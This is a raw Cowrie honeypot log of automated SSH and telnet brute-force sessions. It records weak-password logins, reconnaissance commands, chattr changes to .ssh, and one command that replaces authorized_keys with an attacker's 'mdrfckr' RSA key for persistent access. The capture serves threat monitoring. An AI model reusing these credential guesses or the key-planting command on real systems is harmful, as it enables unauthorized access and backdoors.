{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:01.257283Z","src_ip":"212.227.235.229","session":"88b3a6bf76ce"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:35:02.005049Z","src_ip":"212.227.235.229","session":"88b3a6bf76ce"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:03.257074Z","src_ip":"212.227.235.229","session":"88b3a6bf76ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60754,"dst_ip":"1.2.3.4","dst_port":22,"session":"1187f9299efa","protocol":"ssh","message":"New connection: 212.227.125.160:60754 (1.2.3.4:22) [session: 1187f9299efa]","sensor":"my-vps","timestamp":"2025-08-28T06:35:10.626783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:10.627452Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:10.861511Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:35:11.532667Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:35:12.058884Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:35:12.059599Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:12.293686Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:12.294893Z","src_ip":"212.227.125.160","session":"1187f9299efa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45620,"dst_ip":"1.2.3.4","dst_port":23,"session":"81830943c8b0","protocol":"telnet","message":"New connection: 212.227.235.229:45620 (1.2.3.4:23) [session: 81830943c8b0]","sensor":"my-vps","timestamp":"2025-08-28T06:35:16.298951Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50200,"dst_ip":"1.2.3.4","dst_port":22,"session":"8020eeec0ac6","protocol":"ssh","message":"New connection: 212.227.235.229:50200 (1.2.3.4:22) [session: 8020eeec0ac6]","sensor":"my-vps","timestamp":"2025-08-28T06:35:17.413386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:17.414297Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:17.659710Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:35:18.402656Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:35:18.913773Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:35:18.914461Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:19.161306Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:19.162687Z","src_ip":"212.227.235.229","session":"8020eeec0ac6"}
{"eventid":"cowrie.session.connect","src_ip":"165.22.215.186","src_port":59174,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8d70652d0db","protocol":"ssh","message":"New connection: 165.22.215.186:59174 (1.2.3.4:22) [session: d8d70652d0db]","sensor":"my-vps","timestamp":"2025-08-28T06:35:24.453099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:35:24.454029Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:35:24.722677Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39744,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdd5b5bcc6ee","protocol":"telnet","message":"New connection: 212.227.125.160:39744 (1.2.3.4:23) [session: fdd5b5bcc6ee]","sensor":"my-vps","timestamp":"2025-08-28T06:35:25.118428Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty@2025","message":"login attempt [root/Qwerty@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:35:25.797797Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.closed","duration":10.000700235366821,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:26.299574Z","src_ip":"212.227.235.229","session":"81830943c8b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:35:26.426486Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:35:26.427175Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:35:26.428231Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:26.698237Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58484,"dst_ip":"1.2.3.4","dst_port":22,"session":"092eae6e4a41","protocol":"ssh","message":"New connection: 212.227.125.160:58484 (1.2.3.4:22) [session: 092eae6e4a41]","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.013096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.014266Z","src_ip":"212.227.125.160","session":"092eae6e4a41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.230624Z","src_ip":"212.227.125.160","session":"092eae6e4a41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:35:27.313778Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.314524Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.585422Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.586340Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.connect","src_ip":"165.22.215.186","src_port":54904,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff42cfeea6a2","protocol":"ssh","message":"New connection: 165.22.215.186:54904 (1.2.3.4:22) [session: ff42cfeea6a2]","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.856409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.857489Z","src_ip":"165.22.215.186","session":"ff42cfeea6a2"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:35:27.880596Z","src_ip":"212.227.125.160","session":"092eae6e4a41"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:35:28.113037Z","src_ip":"165.22.215.186","session":"ff42cfeea6a2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:29.098762Z","src_ip":"212.227.125.160","session":"092eae6e4a41"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:35:29.206908Z","src_ip":"165.22.215.186","session":"ff42cfeea6a2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:30.481654Z","src_ip":"165.22.215.186","session":"ff42cfeea6a2"}
{"eventid":"cowrie.session.connect","src_ip":"165.22.215.186","src_port":54916,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ef971c431d8","protocol":"ssh","message":"New connection: 165.22.215.186:54916 (1.2.3.4:22) [session: 0ef971c431d8]","sensor":"my-vps","timestamp":"2025-08-28T06:35:30.731286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:35:30.732057Z","src_ip":"165.22.215.186","session":"0ef971c431d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:35:30.982812Z","src_ip":"165.22.215.186","session":"0ef971c431d8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:35:32.021036Z","src_ip":"165.22.215.186","session":"0ef971c431d8"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:32.272273Z","src_ip":"165.22.215.186","session":"d8d70652d0db"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:35:32.273113Z","src_ip":"165.22.215.186","session":"0ef971c431d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50522,"dst_ip":"1.2.3.4","dst_port":22,"session":"88ca6298217f","protocol":"ssh","message":"New connection: 212.227.235.229:50522 (1.2.3.4:22) [session: 88ca6298217f]","sensor":"my-vps","timestamp":"2025-08-28T06:35:33.545603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:35:33.546488Z","src_ip":"212.227.235.229","session":"88ca6298217f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 